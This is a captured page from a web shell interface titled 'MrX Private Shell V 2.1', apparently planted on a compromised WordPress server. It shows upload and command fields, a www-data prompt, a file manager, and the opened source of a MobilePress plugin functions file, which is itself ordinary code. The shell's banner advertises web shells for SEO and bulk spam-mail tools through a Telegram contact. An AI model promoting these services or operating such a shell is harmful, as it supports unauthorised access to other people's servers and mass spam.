__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.67: ~ $
<?php
if ( ! function_exists( 'mopr_check_table_exists' ) ) {
	/**
	 * Checks if the MobilePress table exists in the WordPress database
	 *
	 * @package MobilePress
	 * @since 1.0
	 */
	function mopr_check_table_exists() {
		global $wpdb;

		if ( $wpdb->get_var( "SHOW TABLES LIKE '" . MOPR_TABLE . "'") == MOPR_TABLE ) {
			return TRUE;
		} else {
			return FALSE;
		}
	}
}

if ( ! function_exists( 'mopr_display_notice' ) )
{
	/**
	 * Displays an admin area notice
	 *
	 * @package MobilePress
	 * @since 1.0
	 */
	function mopr_display_notice( $notice ) {
		echo '<div id="message" class="updated fade">' . $notice . '</div>';
	}
}

if ( ! function_exists( 'mopr_get_option' ) ) {
	/**
	 * Fetches the specified option from the MobilePress database table
	 *
	 * @package MobilePress
	 * @since 1.0
	 */
	function mopr_get_option( $option_name, $number = NULL ) {
		global $wpdb;

		if ( $number == NULL ) {
			$number = 0;
		} else {
			$number -= 1;
		}

		// Select the option from the mobilepress table
		$sql	= "SELECT option_value, option_value_2 FROM " . MOPR_TABLE . " WHERE option_name = '" . $wpdb->escape( $option_name ) . "'";
		$result	= $wpdb->get_row( $sql , ARRAY_N );

		if ( isset( $result[$number] ) ) {
			return $result[$number];
		}

		return NULL;
	}
}

if ( ! function_exists( 'mopr_get_version' ) ) {
	/**
	 * Fetches and returns the current version of the plugin
	 *
	 * @package MobilePress
	 * @since 1.0
	 */
	function mopr_get_version() {
		if ( ! function_exists( 'get_plugin_data' ) ) {
			if ( file_exists( ABSPATH . 'wp-admin/includes/plugin.php' ) ) {
				require_once( ABSPATH . 'wp-admin/includes/plugin.php' );
			} else {
				return 'Error!';
			}
		}

		$data = get_plugin_data( dirname( dirname( dirname( __FILE__ ) ) ) . '/mobilepress/mobilepress.php' );
		return $data['Version'];
	}
}

if ( ! function_exists('mopr_load_view'))
{
	/**
	 * Loads a view
	 *
	 * @package MobilePress
	 * @since 1.1
	 */
	function mopr_load_view($view, $vars = NULL)
	{
		if ($vars != NULL)
		{
			foreach ($vars as $name => $value)
			{
				// Assign definied variables sent to function with the name they set
				$$name = $value;
			}
		}

		if (($_view = include(MOPR_PATH . 'views/' . $view . '.php')) !== FALSE)
		{
			echo trim($_view, '1');
		}
	}
}
?>

Filemanager

Name Type Size Permission Actions
api.php File 2.26 KB 0644
functions.php File 2.23 KB 0644
Filemanager